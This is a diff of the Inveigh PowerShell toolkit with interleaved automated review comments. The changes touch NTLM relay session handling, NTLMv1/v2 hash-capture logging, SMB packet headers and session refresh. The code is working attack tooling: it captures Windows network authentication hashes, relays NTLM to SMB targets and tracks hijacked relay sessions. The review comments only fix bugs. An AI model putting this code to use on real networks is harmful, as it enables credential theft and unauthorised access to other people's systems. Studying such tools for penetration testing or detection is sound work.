- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3378,7 +3432,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3386,7 +3440,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3506,6 +3560,7 @@ $control_relay_scriptblock =
function SigningCheck
{
+ $process_ID_bytes = Get-ProcessIDArray
$target_list = $inveigh.target_list
ForEach($target_entry in $target_list)
@@ -3520,7 +3575,7 @@ $control_relay_scriptblock =
}
else
{
- SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true > $null
+ SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true $process_ID_bytes > $null
}
}
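Review bot: `'$SMB1'` on the added call is single-quoted, so SMBRelayChallenge receives the literal five-character string `$SMB1` as its SMB-version argument rather than the value of `$SMB1`; the other call sites in this diff pass `$SMB_version` unquoted. Whatever the function compares that parameter against, a literal `$SMB1` is unlikely to match, so either drop the quotes or pass the exact string the function tests for. The surrounding SigningCheck loop body begins outside this hunk.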
@@ -3535,13 +3590,9 @@ $control_relay_scriptblock =
function OutputQueueLoop
{
- while($inveigh.output_queue.Count -gt 0)
+ while($inveigh.output_queue.Count -gt 0 -and $inveigh.output_pause)
{
-
- if($inveigh.console_output)
- {
- $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
- }
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
if($inveigh.file_output)
{
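Review bot: `while($inveigh.output_queue.Count -gt 0 -and $inveigh.output_pause)` drains the queue only while output is paused, which is the opposite of the same function in Inveigh.ps1 (`-and !$inveigh.output_pause`) and of how the flag is used in this commit: it is set true during startup and cleared afterwards. With the flag false in normal operation, the OutputQueueLoop call the later control-loop hunk adds never flushes, so console, file and log output stall. Suggest `while($inveigh.output_queue.Count -gt 0 -and !$inveigh.output_pause)`. Separately, dropping the `if($inveigh.console_output)` guard means console_queue is appended to even when console output is off; if nothing drains it in that mode the queue grows for the life of the run, which is worth confirming.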
@@ -3649,27 +3700,6 @@ $control_relay_scriptblock =
while($inveigh.relay_running)
{
-
- while($inveigh.output_queue.Count -gt 0)
- {
-
- if($inveigh.console_output)
- {
- $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
- }
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($inveigh.output_queue[0]) > $null
- }
-
- $inveigh.output_queue.RemoveAt(0)
- }
if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
{
@@ -3732,6 +3762,7 @@ $control_relay_scriptblock =
}
+ OutputQueueLoop
Start-Sleep -m 5
}
@@ -3742,6 +3773,8 @@ $session_refresh_scriptblock =
{
param ($SessionRefresh)
+ $process_ID_bytes = Get-ProcessIDArray
+
while($inveigh.relay_running)
{
@@ -3762,12 +3795,9 @@ $session_refresh_scriptblock =
$SMB2_message_ID = $inveigh.session_message_ID_table[$session]
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_client_receive = New-Object System.Byte[] 1024
- $SMB_path = "\\" + $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString + "\IPC$"
- $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- #$packet_SMB2_header["ProcessID"] = $process_ID_bytes
- $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x0D,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2Echo
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
@@ -3782,7 +3812,7 @@ $session_refresh_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null
}
$inveigh.session_lock_table[$Session] = 'open'
@@ -3791,12 +3821,12 @@ $session_refresh_scriptblock =
}
$session++
+ Start-Sleep -s 1
}
-
-
+
}
- Start-Sleep -m 5
+ Start-Sleep -s 1
}
}
@@ -4358,6 +4388,9 @@ Get captured POST requests.
.PARAMETER POSTRequestUnique
Get unique captured POST request.
+
+.PARAMETER Session
+Get relay session list.
#>
[CmdletBinding()]
diff --git a/Inveigh.ps1 b/Inveigh.ps1
index 0ab78a1..5a8a791 100644
--- a/Inveigh.ps1
+++ b/Inveigh.ps1
@@ -484,13 +484,11 @@ if(!$inveigh)
$inveigh.requested_host_list = New-Object System.Collections.ArrayList
$inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
$inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.session_list = @()
$inveigh.session_socket_table = [HashTable]::Synchronized(@{})
$inveigh.session_table = [HashTable]::Synchronized(@{})
$inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
- $inveigh.session_user_table = [HashTable]::Synchronized(@{})
- $inveigh.session_timestamp_table = [HashTable]::Synchronized(@{})
$inveigh.session_lock_table = [HashTable]::Synchronized(@{})
- $inveigh.session_privilege_table = [HashTable]::Synchronized(@{})
$inveigh.session_count = 0
}
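Review bot: `$inveigh.session_list = @()` introduces a plain array into a table whose other members are synchronized hashtables or ArrayLists; the relay HTTP scriptblock appends with `+=`, which replaces the array on every append, while readers in other runspaces enumerate whichever instance they last fetched. If sessions are added and queried from different runspaces, a synchronized list, `$inveigh.session_list = [System.Collections.ArrayList]::Synchronized((New-Object System.Collections.ArrayList))` with `.Add($session_object) > $null`, matches the surrounding tables and avoids the copy-on-append. The three removed per-session tables presumably move onto the session objects' properties; confirm no remaining reader still references them.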
@@ -691,6 +689,11 @@ else
$inveigh.newline = ""
}
+if($inveigh.relay_running)
+{
+ $inveigh.output_pause = $true
+}
+
# Write startup messages
$inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null
@@ -1342,6 +1345,11 @@ while($inveigh.output_queue.Count -gt 0)
}
+if($inveigh.relay_running)
+{
+ $inveigh.output_pause = $false
+}
+
# Begin ScriptBlocks
# Shared Basic Functions ScriptBlock
@@ -1588,7 +1596,7 @@ $SMB_NTLM_functions_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
@@ -1624,7 +1632,7 @@ $SMB_NTLM_functions_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
@@ -1977,6 +1985,7 @@ $HTTP_scriptblock =
$HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
$HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
$HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+ $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
if($HTTP_NTLM_length -eq 24) # NTLMv1
{
@@ -1988,24 +1997,24 @@ $HTTP_scriptblock =
{
$inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
$inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
- if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
{
- $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
}
}
@@ -2021,24 +2030,24 @@ $HTTP_scriptblock =
{
$inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
$inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
$inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
- if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
{
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
}
}
@@ -3413,13 +3422,9 @@ $control_scriptblock =
function OutputQueueLoop
{
- while($inveigh.output_queue.Count -gt 0)
+ while($inveigh.output_queue.Count -gt 0 -and !$inveigh.output_pause)
{
-
- if($inveigh.console_output)
- {
- $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
- }
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
if($inveigh.file_output)
{
@@ -3618,7 +3623,7 @@ $control_scriptblock =
# Begin Startup Functions
# HTTP Listener Startup Function
-function HTTPListener()
+function HTTPListener
{
$proxy_listener = $false
$HTTPS_listener = $false
@@ -3641,7 +3646,7 @@ function HTTPListener()
Start-Sleep -m 50
# HTTPS Listener Startup Function
-function HTTPSListener()
+function HTTPSListener
{
$proxy_listener = $false
$HTTPS_listener = $true
@@ -3664,7 +3669,7 @@ function HTTPSListener()
Start-Sleep -m 50
# Proxy Listener Startup Function
-function ProxyListener()
+function ProxyListener
{
$proxy_listener = $true
$HTTPS_listener = $false
@@ -3685,7 +3690,7 @@ function ProxyListener()
}
# Sniffer/Spoofer Startup Function
-function SnifferSpoofer()
+function SnifferSpoofer
{
if($inveigh.DNS)
@@ -3720,7 +3725,7 @@ function SnifferSpoofer()
}
# Unprivileged LLMNR Spoofer Startup Function
-function LLMNRSpoofer()
+function LLMNRSpoofer
{
if($inveigh.DNS)
@@ -3751,7 +3756,7 @@ function LLMNRSpoofer()
}
# Unprivileged mDNS Spoofer Startup Function
-function mDNSSpoofer()
+function mDNSSpoofer
{
$mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$mDNS_spoofer_runspace.Open()
@@ -3768,7 +3773,7 @@ function mDNSSpoofer()
}
# Unprivileged NBNS Spoofer Startup Function
-function NBNSSpoofer()
+function NBNSSpoofer
{
if($inveigh.DNS)
@@ -3799,7 +3804,7 @@ function NBNSSpoofer()
}
# NBNS Brute Force Spoofer Startup Function
-function NBNSBruteForceSpoofer()
+function NBNSBruteForceSpoofer
{
$NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_bruteforce_spoofer_runspace.Open()
@@ -3814,7 +3819,7 @@ function NBNSBruteForceSpoofer()
}
# Control Loop Startup Function
-function ControlLoop()
+function ControlLoop
{
if($inveigh.DNS)
{
@@ -4327,214 +4332,204 @@ Get captured POST requests.
.PARAMETER POSTRequestUnique
Get unique captured POST request.
-#>
-
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][Switch]$Cleartext,
- [parameter(Mandatory=$false)][Switch]$CleartextUnique,
- [parameter(Mandatory=$false)][Switch]$Console,
- [parameter(Mandatory=$false)][Switch]$DNS,
- [parameter(Mandatory=$false)][Switch]$DNSFailed,
- [parameter(Mandatory=$false)][Switch]$Learning,
- [parameter(Mandatory=$false)][Switch]$Log,
- [parameter(Mandatory=$false)][Switch]$NTLMv1,
- [parameter(Mandatory=$false)][Switch]$NTLMv2,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
- [parameter(Mandatory=$false)][Switch]$POSTRequest,
- [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
- [parameter(Mandatory=$false)][Switch]$Session,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-if($Console -or $PSBoundParameters.Count -eq 0)
-{
+.PARAMETER Session
+Get relay session list.
+#>
- while($inveigh.console_queue.Count -gt 0)
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$DNS,
+ [parameter(Mandatory=$false)][Switch]$DNSFailed,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$POSTRequest,
+ [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
+ [parameter(Mandatory=$false)][Switch]$Session,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+ )
+
+ if($Console -or $PSBoundParameters.Count -eq 0)
{
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
+ while($inveigh.console_queue.Count -gt 0)
{
- switch -wildcard ($inveigh.console_queue[0])
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
{
- {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ switch -wildcard ($inveigh.console_queue[0])
{
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
}
}
-
+
}
-
- }
-
-}
-if($DNS)
-{
+ }
- foreach($DNS in $inveigh.DNS_list)
+ if($DNS)
{
-
- if($DNS.StartsWith("1,"))
+
+ foreach($DNS in $inveigh.DNS_list)
{
- Write-Output $DNS.Substring(2)
+
+ if($DNS.StartsWith("1,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
}
}
-}
-
-if($DNSFailed)
-{
-
- foreach($DNS in $inveigh.DNS_list)
+ if($DNSFailed)
{
-
- if($DNS.StartsWith("0,"))
+
+ foreach($DNS in $inveigh.DNS_list)
{
- Write-Output $DNS.Substring(2)
+
+ if($DNS.StartsWith("0,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
}
}
-}
-
-if($Log)
-{
- Write-Output $inveigh.log
-}
-
-if($NTLMv1)
-{
- Write-Output $inveigh.NTLMv1_list
-}
+ if($Log)
+ {
+ Write-Output $inveigh.log
+ }
-if($NTLMv1Unique)
-{
- $inveigh.NTLMv1_list.Sort()
+ if($NTLMv1)
+ {
+ Write-Output $inveigh.NTLMv1_list
+ }
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ if($NTLMv1Unique)
{
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+ $inveigh.NTLMv1_list.Sort()
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
{
- Write-Output $unique_NTLMv1
- }
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
- }
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output $unique_NTLMv1
+ }
-}
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
-if($NTLMv1Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
+ }
-if($NTLMv2)
-{
- Write-Output $inveigh.NTLMv2_list
-}
+ if($NTLMv1Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
-if($NTLMv2Unique)
-{
- $inveigh.NTLMv2_list.Sort()
+ if($NTLMv2)
+ {
+ Write-Output $inveigh.NTLMv2_list
+ }
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ if($NTLMv2Unique)
{
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+ $inveigh.NTLMv2_list.Sort()
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
{
- Write-Output $unique_NTLMv2
- }
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
-}
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
-if($NTLMv2Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
+ }
-if($Cleartext)
-{
- Write-Output $inveigh.cleartext_list
-}
+ if($NTLMv2Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
-if($CleartextUnique)
-{
- Write-Output $inveigh.cleartext_list | Get-Unique
-}
+ if($Cleartext)
+ {
+ Write-Output $inveigh.cleartext_list
+ }
-if($POSTRequest)
-{
- Write-Output $inveigh.POST_request_list
-}
+ if($CleartextUnique)
+ {
+ Write-Output $inveigh.cleartext_list | Get-Unique
+ }
-if($POSTRequestUnique)
-{
- Write-Output $inveigh.POST_request_list | Get-Unique
-}
+ if($POSTRequest)
+ {
+ Write-Output $inveigh.POST_request_list
+ }
-if($Learning)
-{
- Write-Output $inveigh.valid_host_list
-}
+ if($POSTRequestUnique)
+ {
+ Write-Output $inveigh.POST_request_list | Get-Unique
+ }
-if($Session)
-{
- $i = 1
- $session_list = @()
+ if($Learning)
+ {
+ Write-Output $inveigh.valid_host_list
+ }
- while($i -le $inveigh.session_socket_table.Count)
+ if($Session)
{
+ $i = 0
- if($inveigh.session_socket_table[$i].Connected)
- {
- $status = "connected"
- }
- else
+ while($i -lt $inveigh.session_socket_table.Count)
{
- $status = "disconnected"
+
+ if(!$inveigh.session_socket_table[$i].Connected)
+ {
+ $inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ $i++
}
- $session_object = New-Object PSObject
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $i
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name System $inveigh.session_socket_table[$i].Client.RemoteEndpoint.Address.IPaddressToString
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $inveigh.session_user_table[$i]
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Admin $inveigh.session_privilege_table[$i]
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $inveigh.session_timestamp_table[$i]
- $session_list += $session_object
- $i++
+ Write-Output $inveigh.session_list | Format-Table -AutoSize
}
- Write-Output $session_list | Format-Table -AutoSize
-}
-
}
function Watch-Inveigh
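Review bot: In the new `$Session` branch, `$inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"}` uses an assignment where a filter scriptblock is expected; the assignment does execute, but the scriptblock yields no output, so Where-Object emits nothing and the line reads like a typo for `-eq`. The intent appears to be a plain property update, `$inveigh.session_list[$i].Status = "disconnected"`, which also avoids the pipeline. This relies on `session_list` and `session_socket_table` being index-aligned, which nothing in the hunk shows; a one-line comment stating that assumption would help. The Get-Inveigh declaration itself is outside the hunk.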
diff --git a/Invoke-SMBClient.ps1 b/Invoke-SMBClient.ps1
index 1db92e5..367969d 100644
--- a/Invoke-SMBClient.ps1
+++ b/Invoke-SMBClient.ps1
@@ -156,6 +156,8 @@ function New-PacketSMBHeader
{
param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+ $packet_process_ID = $packet_process_ID[0,1]
+
$packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
$packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
$packet_SMBHeader.Add("Command",$packet_command)
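Review bot: The added `$packet_process_ID = $packet_process_ID[0,1]` changes New-PacketSMBHeader's contract without saying so: the `[0,1]` slice moved here from the NegotiateSMB call site (hunk ending at L1602), and callers now pass the full 4-byte PID while the function keeps only the low two bytes. Suggested comment above the line: `# the SMB1 header PID field is 16-bit: keep the low two bytes of the 4-byte value callers now pass`. The same line is added to Invoke-SMBExec.ps1 in the hunk ending at L1794.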
@@ -209,7 +211,7 @@ function New-PacketSMBNegotiateProtocolRequest
function New-PacketSMB2Header
{
- param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
[Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
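Review bot: `$packet_process_ID` is inserted in the middle of New-PacketSMB2Header's positional parameter list, so any caller not updated in this commit would silently bind `$SMB2_tree_ID` to ProcessID and `$SMB_session_ID` to TreeID with no binding error, producing a malformed header instead of failing fast. The call sites visible in this file are all updated, and the same signature change is made in Invoke-SMBExec.ps1 (hunk ending at L1841), but anything outside this diff using the old shape would break quietly. Appending the new parameter at the end, or switching the call sites to named parameters, would make the mismatch impossible. The function body continues outside the hunk.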
@@ -224,7 +226,7 @@ function New-PacketSMB2Header
$packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("MessageID",$packet_message_ID)
- $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("ProcessID",$packet_process_ID)
$packet_SMB2Header.Add("TreeID",$packet_tree_ID)
$packet_SMB2Header.Add("SessionID",$packet_session_ID)
$packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
@@ -746,15 +748,20 @@ elseif($Source -is [String])
[String]$session_string = $session
-if($session_string -and !$Inveigh -or !$inveigh.session_socket_table[$session])
-{
- Write-Output "[-] Inveigh Relay session not found"
- $startup_error = $true
-}
-elseif($session_string -and !$inveigh.session_socket_table[$session].Connected)
+if($session_string)
{
- Write-Output "[-] Inveigh Relay session not connected"
- $startup_error = $true
+
+ if(!$Inveigh -or !$inveigh.session_socket_table[$session])
+ {
+ Write-Output "[-] Inveigh Relay session not found"
+ $startup_error = $true
+ }
+ elseif(!$inveigh.session_socket_table[$session].Connected)
+ {
+ Write-Output "[-] Inveigh Relay session not connected"
+ $startup_error = $true
+ }
+
}
$destination = $Destination.Replace('.\','')
@@ -775,8 +782,7 @@ else
$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-#[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-[Byte[]]$process_ID_bytes = 0x00,0x00,0x00,0x00
+[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
if(!$session_string_string)
{
@@ -997,7 +1003,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'NegotiateSMB'
{
- $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes[0,1] 0x00,0x00
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00
$packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
